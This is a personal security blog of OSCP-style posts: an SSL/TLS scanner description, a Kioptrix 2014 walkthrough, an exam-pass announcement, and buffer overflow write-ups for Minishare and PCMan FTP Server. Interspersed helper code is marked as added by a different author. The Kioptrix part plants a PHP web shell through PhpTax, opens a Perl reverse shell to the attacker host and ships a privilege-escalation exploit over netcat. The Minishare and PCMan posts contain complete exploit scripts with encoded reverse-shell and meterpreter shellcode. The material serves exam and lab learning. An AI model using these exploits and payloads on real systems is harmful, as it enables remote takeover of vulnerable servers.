Mesh Software

Software | Programs | Mobile Apps | Networking Projects

Friday, 5 October 2018

How to set up the BurpSuite Jython environment (Burp Extender)

SSL Scanner
This extension enables Burp to scan for SSL/TLS vulnerabilities.

Most of the testing logic is taken from testssl.sh; the Heartbleed and CCS Injection test code is adapted from a2sv.

Vulnerabilities:

SSLv2 and SSLv3 connectivity
Heartbleed
CCS Injection
TLS_FALLBACK_SCSV support
POODLE (SSLv3)
Sweet32
DROWN
FREAK
LUCKY13
CRIME (TLS Compression)
BEAST
Check for weak ciphers
BREACH
Logjam
Author: Pattara Teerapong and Meatasit Karakate
Version: 1.2
Last updated: 15 August 2018
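As an added example (not code from the SSL Scanner extension, testssl.sh or a2sv), here is the kind of name-based rule behind the "weak ciphers", Sweet32, FREAK and Logjam entries in the list above, applied to an OpenSSL-style cipher list. The input format, the marker strings and the sample list are assumptions of mine; the protocol-level checks in the list (SSLv2/v3 connectivity, Heartbleed, CCS Injection, POODLE, BEAST, CRIME, BREACH, TLS_FALLBACK_SCSV) need a live handshake and are not covered here.

```python
import re

# Facts these rules encode: Sweet32 abuses 64-bit block ciphers (3DES, Blowfish,
# IDEA); FREAK abuses export-grade RSA key exchange; Logjam abuses export-grade
# DHE; RC4, single DES, NULL encryption, anonymous key exchange and MD5 MACs
# count as weak ciphers. The name fragments below follow OpenSSL naming and are
# an assumption, not the extension's own matching logic.
SWEET32_MARKS = ("3DES", "DES-CBC3", "BF-", "IDEA")
WEAK_MARKS = ("RC4", "NULL", "MD5")
ANON_PREFIXES = ("ADH-", "AECDH-")
SINGLE_DES = re.compile(r"(^|-)DES-CBC-")   # DES-CBC-SHA, but not DES-CBC3-SHA

# Constructed sample (not real scan output) in `openssl ciphers` format.
SAMPLE_CIPHERS = ("ECDHE-RSA-AES128-GCM-SHA256:DES-CBC3-SHA:EXP-RC4-MD5:"
                  "EXP-EDH-RSA-DES-CBC-SHA:RC4-SHA:NULL-MD5:AES256-SHA")


def classify_cipher(name):
    """Return the sorted list of weakness labels that apply to one cipher name."""
    n = name.strip().upper()
    findings = set()
    if n.startswith("EXP-") or "EXPORT" in n:
        # export DHE -> Logjam, export RSA -> FREAK; both are weak in any case
        findings.add("Logjam" if ("EDH" in n or "DHE" in n) else "FREAK")
        findings.add("weak cipher")
    if any(m in n for m in SWEET32_MARKS):
        findings.add("Sweet32")
    if (any(m in n for m in WEAK_MARKS) or n.startswith(ANON_PREFIXES)
            or SINGLE_DES.search(n)):
        findings.add("weak cipher")
    return sorted(findings)


def audit_cipher_list(cipher_list):
    """Map every cipher in a colon-separated list that has a finding to its labels."""
    report = {}
    for name in cipher_list.split(":"):
        name = name.strip()
        if not name:
            continue
        labels = classify_cipher(name)
        if labels:
            report[name] = labels
    return report


if __name__ == "__main__":
    for cipher, labels in audit_cipher_list(SAMPLE_CIPHERS).items():
        print("%-28s %s" % (cipher, ", ".join(labels)))
```

Feed it the cipher list a server actually negotiates (for example the output of a cipher enumeration), not the client's default list, and treat the result as a triage list to confirm with a handshake-based tool.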

Why do I get this error when starting msf? (msfconsole / msfvenom)

The fix is a one-line change in the Android payload module: the certificate that the payload generator signs the APK with is created with a 20-year validity, which is shortened to 2 years.

Commands:

root@kali:/usr/share/metasploit-framework/lib/msf/core/payload# gedit android.rb

#cert.not_after = cert.not_before + 3600*24*365*20 # 20 years (original line, left commented out)
cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

Saturday, 29 September 2018

Remote Code Execution kioptrix 2014

Get the VM's IP:

arp-scan --localnet

Enumeration:

nmap -A 192.168.85.145

LFI (pChart 2.1.3 directory traversal; read /etc/passwd and the Apache config):

http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd
http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf
https://www.exploit-db.com/exploits/31173/


Port 8080 (request it with a Mozilla/4.0 User-Agent):

curl -H "User-Agent:Mozilla/4.0" http://192.168.85.145:8080


RCE:

PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution
https://www.exploit-db.com/exploits/25849/

Write a PHP stager into phptax/data/ through the 'newvalue' parameter (the browser URL-encodes the PHP tag):

http://192.168.85.145:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>

Confirm code execution:

http://192.168.85.145:8080/phptax/data/rce.php?cmd=id

uid=80(www) gid=80(www) groups=80(www)

Reverse shell to the attacker (192.168.85.144) on port 443; start a listener on that port before requesting this URL:

http://192.168.85.145:8080/phptax/data/rce.php?cmd=perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.85.144:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



Privilege Escalation:

searchsploit freebsd 9.0
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
https://www.exploit-db.com/exploits/26368/

Transfer the exploit source with netcat. On the attacker (192.168.85.144), serve the file:

nc -lvp 1111 < 26368.c

On the target, pull it and compile it there:

nc -n 192.168.85.144 1111 > 26368.c
gcc 26368.c -o prives




Friday, 21 September 2018

Alhamdulillah! OSCP Passed


Alhamdulillah!


With the grace of Almighty Allah and the prayers of my family, I have passed the #OSCP exam and I am one step closer to the target.

JazakAllah

#OSCP #tryharder #offsec

https://www.youracclaim.com/badges/ae4ec2d8-3559-495d-bc16-204667d7b851

Monday, 10 September 2018

Minishare Buffer Overflow Exploitation

Commands:

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800
(send the 1800-byte cyclic pattern in place of the "A"s and note the EIP value at the crash)
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1800 -q 36684335
[*] Exact match at offset 1787
!mona jmp -r esp
(mona lists JMP ESP addresses; 0x7CA58265 in SHELL32.dll is the one used below)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.85.141 LPORT=443 -b "\x00\x0d" -f python
Source Code:

#!/usr/bin/python
# Minishare buffer overflow: an overlong GET request path overwrites the saved return address.
import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(('192.168.85.136',80))
pre_buff="GET "

# shellcode from: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.85.141 LPORT=443 -b "\x00\x0d" -f python
buf =  ""
buf += "\xba\x61\xb3\x87\x4c\xda\xdb\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x55\x12\x83\xc5\x04\x03\x34\xbd\x65"
buf += "\xb9\x4a\x29\xeb\x42\xb2\xaa\x8c\xcb\x57\x9b\x8c\xa8"
buf += "\x1c\x8c\x3c\xba\x70\x21\xb6\xee\x60\xb2\xba\x26\x87"
buf += "\x73\x70\x11\xa6\x84\x29\x61\xa9\x06\x30\xb6\x09\x36"
buf += "\xfb\xcb\x48\x7f\xe6\x26\x18\x28\x6c\x94\x8c\x5d\x38"
buf += "\x25\x27\x2d\xac\x2d\xd4\xe6\xcf\x1c\x4b\x7c\x96\xbe"
buf += "\x6a\x51\xa2\xf6\x74\xb6\x8f\x41\x0f\x0c\x7b\x50\xd9"
buf += "\x5c\x84\xff\x24\x51\x77\x01\x61\x56\x68\x74\x9b\xa4"
buf += "\x15\x8f\x58\xd6\xc1\x1a\x7a\x70\x81\xbd\xa6\x80\x46"
buf += "\x5b\x2d\x8e\x23\x2f\x69\x93\xb2\xfc\x02\xaf\x3f\x03"
buf += "\xc4\x39\x7b\x20\xc0\x62\xdf\x49\x51\xcf\x8e\x76\x81"
buf += "\xb0\x6f\xd3\xca\x5d\x7b\x6e\x91\x09\x48\x43\x29\xca"
buf += "\xc6\xd4\x5a\xf8\x49\x4f\xf4\xb0\x02\x49\x03\xb6\x38"
buf += "\x2d\x9b\x49\xc3\x4e\xb2\x8d\x97\x1e\xac\x24\x98\xf4"
buf += "\x2c\xc8\x4d\x5a\x7c\x66\x3e\x1b\x2c\xc6\xee\xf3\x26"
buf += "\xc9\xd1\xe4\x49\x03\x7a\x8e\xb0\xc4\x45\xe7\xef\x99"
buf += "\x2e\xfa\x0f\xa3\x15\x73\xe9\xc9\x79\xd2\xa2\x65\xe3"
buf += "\x7f\x38\x17\xec\x55\x45\x17\x66\x5a\xba\xd6\x8f\x17"
buf += "\xa8\x8f\x7f\x62\x92\x06\x7f\x58\xba\xc5\x12\x07\x3a"
buf += "\x83\x0e\x90\x6d\xc4\xe1\xe9\xfb\xf8\x58\x40\x19\x01"
buf += "\x3c\xab\x99\xde\xfd\x32\x20\x92\xba\x10\x32\x6a\x42"
buf += "\x1d\x66\x22\x15\xcb\xd0\x84\xcf\xbd\x8a\x5e\xa3\x17"
buf += "\x5a\x26\x8f\xa7\x1c\x27\xda\x51\xc0\x96\xb3\x27\xff"
buf += "\x17\x54\xa0\x78\x4a\xc4\x4f\x53\xce\xf4\x05\xf9\x67"
buf += "\x9d\xc3\x68\x3a\xc0\xf3\x47\x79\xfd\x77\x6d\x02\xfa"
buf += "\x68\x04\x07\x46\x2f\xf5\x75\xd7\xda\xf9\x2a\xd8\xce"


end_buff=" HTTP/1.1\r\n\r\n"
# Return address 7CA58265 (jmp esp) is written byte-reversed because x86 is little endian
buff = "A"*1787 + "\x65\x82\xA5\x7C" + "\x90"*20 + buf   # padding + EIP + NOP sled + shellcode
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
try:
    sock.recv(1024)   # the server normally dies here, so a reset or timeout is expected
except socket.error:
    pass
sock.close()

BAD CHARS (sent right after the EIP overwrite; compare the stack in the debugger with this list, drop the first byte that is missing or altered, then repeat without it):

#!/usr/bin/python
import socket
buff = "A"*1787 +"B"*4
bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buff = buff+bad
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.85.136',80))
sock.send("GET " + buff + " HTTP/1.1\r\n\r\n")
sock.close()
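An added Python 3 reimplementation of the pattern_create / pattern_offset step and of the little-endian packing of the return address; this is not code from the post or from Metasploit (the pattern follows Metasploit's documented Aa0Aa1... scheme). It reproduces the offset 1787 for the EIP value 36684335 from the commands above; the function names are mine.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: uppercase, lowercase, digit triplets.
    Every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip, length=20280):
    """eip: the value shown in the debugger, as an int or a hex string such as
    '36684335'. The CPU loaded it little-endian, so the bytes that sat in the
    buffer are the reverse of the printed value. Returns the offset or -1."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


def pack_ret(addr):
    """The 4 bytes to put in the buffer so that `addr` ends up in EIP."""
    return struct.pack("<I", addr)


def build_buffer(offset, ret_addr, shellcode, nop_len=20):
    """Padding up to EIP, the return address, a NOP sled, then the shellcode."""
    return b"A" * offset + pack_ret(ret_addr) + b"\x90" * nop_len + shellcode


if __name__ == "__main__":
    print(pattern_create(1800)[:24])                 # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset("36684335"))                # 1787
    print(pack_ret(0x7CA58265))                      # b'e\x82\xa5|'  i.e. \x65\x82\xA5\x7C
```

pattern_offset() searches the full 20280-byte pattern by default, so it also works when the crash buffer was longer than the one you sent; -1 means the value in EIP did not come from the pattern (a partial overwrite, or the crash is somewhere else).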

Sunday, 9 September 2018

PCMan FTP Server Remote Buffer Overflow

Commands:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.141 LPORT=31337 -b '\x00\x0a\x0d' -f python
(Payload size: 360 bytes)

Handler (msfconsole, exploit/multi/handler):
set payload windows/meterpreter/reverse_tcp
set lhost <host>
set lport <port>
set exitonsession false
exploit -j -z

Return address (jmp esp in SHELL32.dll, stored little-endian):

eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]

Bad Chars (\x00 is already left out; sent as the PUT argument after the EIP overwrite, using the same login sequence as Buf.py):

import sys, socket
host, port = sys.argv[1], int(sys.argv[2])
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send("USER anonymous\r\n"); s.recv(1024)
s.send("PASS anonymous\r\n"); s.recv(1024)
s.send("PUT " + "\x41" * 2008 + "B" * 4 + payload + "\r\n")
s.close()

Buf.py

#!/usr/bin/python
# Exploit: PCMan FTP Server 2.0.7 PUT Buffer Overflow
# Author: @xerubus
# CVE: 2013-4730
import sys, socket

if len(sys.argv) < 3:
    print "Usage: python exploit.py [host] [port]"
    exit()

host = sys.argv[1]
port = int(sys.argv[2])

rubbish = "\x41" * 2008  # padding up to the saved return address (EIP offset)
eip = "\x65\x82\xA5\x7C" # 0x7CA58265 little-endian : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]
nop = "\x90" * 30        # NOP sled, so a slightly different ESP still lands in the shellcode

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.77.43 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z

buf =  ""
buf += "\xdb\xcf\xbb\x55\x2e\x92\x41\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x54\x31\x5f\x18\x03\x5f\x18\x83\xc7\x51\xcc"
buf += "\x67\xbd\xb1\x92\x88\x3e\x41\xf3\x01\xdb\x70\x33\x75"
buf += "\xaf\x22\x83\xfd\xfd\xce\x68\x53\x16\x45\x1c\x7c\x19"
buf += "\xee\xab\x5a\x14\xef\x80\x9f\x37\x73\xdb\xf3\x97\x4a"
buf += "\x14\x06\xd9\x8b\x49\xeb\x8b\x44\x05\x5e\x3c\xe1\x53"
buf += "\x63\xb7\xb9\x72\xe3\x24\x09\x74\xc2\xfa\x02\x2f\xc4"
buf += "\xfd\xc7\x5b\x4d\xe6\x04\x61\x07\x9d\xfe\x1d\x96\x77"
buf += "\xcf\xde\x35\xb6\xe0\x2c\x47\xfe\xc6\xce\x32\xf6\x35"
buf += "\x72\x45\xcd\x44\xa8\xc0\xd6\xee\x3b\x72\x33\x0f\xef"
buf += "\xe5\xb0\x03\x44\x61\x9e\x07\x5b\xa6\x94\x33\xd0\x49"
buf += "\x7b\xb2\xa2\x6d\x5f\x9f\x71\x0f\xc6\x45\xd7\x30\x18"
buf += "\x26\x88\x94\x52\xca\xdd\xa4\x38\x82\x12\x85\xc2\x52"
buf += "\x3d\x9e\xb1\x60\xe2\x34\x5e\xc8\x6b\x93\x99\x2f\x46"
buf += "\x63\x35\xce\x69\x94\x1f\x14\x3d\xc4\x37\xbd\x3e\x8f"
buf += "\xc7\x42\xeb\x3a\xc2\xd4\xd4\x13\x87\xa9\xbd\x61\x28"
buf += "\xcb\x54\xef\xce\x7b\xf7\xbf\x5e\x3b\xa7\x7f\x0f\xd3"
buf += "\xad\x8f\x70\xc3\xcd\x45\x19\x69\x22\x30\x71\x05\xdb"
buf += "\x19\x09\xb4\x24\xb4\x77\xf6\xaf\x3d\x87\xb8\x47\x37"
buf += "\x9b\xac\x39\xb7\x63\x2c\xd0\xb7\x09\x28\x72\xef\xa5"
buf += "\x32\xa3\xc7\x69\xcd\x86\x5b\x6d\x31\x57\x6a\x05\x07"
buf += "\xcd\xd2\x71\x67\x01\xd3\x81\x31\x4b\xd3\xe9\xe5\x2f"
buf += "\x80\x0c\xea\xe5\xb4\x9c\x7e\x06\xed\x71\x29\x6e\x13"
buf += "\xaf\x1d\x31\xec\x9a\x1e\x36\x12\x58\x02\x9f\x7b\xa2"
buf += "\x02\x1f\x7c\xc8\x82\x4f\x14\x07\xad\x60\xd4\xe8\x64"
buf += "\x29\x7c\x62\xe8\x9b\x1d\x73\x21\x7d\x80\x74\xc5\xa6"
buf += "\xd5\xfa\x2a\x59\xda\xfc\x17\x8f\xe3\x8a\x50\x13\x50"
buf += "\x84\xeb\x36\xf1\x0f\x13\x64\x01\x1a"

evil = rubbish + eip + nop + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
s.recv(1024)                     # banner
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
s.send("PUT " + evil + "\r\n")   # the overlong argument overwrites the saved EIP
s.close()
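Bad-character triage for the -b lists in this post (\x00\x0a\x0d) and in the Minishare post above (\x00\x0d), as an added Python 3 example that is not part of either exploit. The debugger step is replaced by a constructed fake_server callback that truncates at NUL, LF and CR; against a real target you pass a callback that sends the test string and returns the bytes read back from the stack at ESP.

```python
def badchar_test_string(exclude=()):
    """Every byte value 0x00-0xff except those already known to be bad."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def find_bad_char(sent, observed):
    """Compare the bytes sent with the bytes read back from the stack.
    Returns the first byte that was altered or after which the copy stops,
    or None when everything survived. Only the first culprit is reliable:
    after a truncation the rest is missing, not necessarily bad."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def triage(send_and_dump, known_bad=(0x00,)):
    """Repeat send -> dump -> compare until a test string survives intact.
    send_and_dump(test: bytes) -> bytes stands in for "send the buffer, then
    copy the bytes at ESP out of the debugger". Returns the sorted bad list."""
    bad = list(known_bad)
    while True:
        test = badchar_test_string(bad)
        culprit = find_bad_char(test, send_and_dump(test))
        if culprit is None:
            return sorted(bad)
        bad.append(culprit)


def msfvenom_b_arg(bad):
    """Format the list the way msfvenom -b expects, e.g. \\x00\\x0a\\x0d."""
    return "".join("\\x%02x" % b for b in bad)


# Constructed stand-in for the target plus debugger (assumed behaviour, not a
# capture from PCMan): the command parser stops at CR or LF and C string
# handling stops at NUL, so the copy on the stack ends at the first of them.
def fake_server(test):
    cut = len(test)
    for term in (0x00, 0x0a, 0x0d):
        if term in test:
            cut = min(cut, test.index(term))
    return test[:cut]


if __name__ == "__main__":
    found = triage(fake_server, known_bad=(0x00,))
    print("bad chars:", msfvenom_b_arg(found))   # \x00\x0a\x0d
```

Because one run only exposes the first offending byte, the loop re-sends without it until the whole string comes back unchanged; three rounds are needed for the PCMan case above (NUL, then LF, then CR).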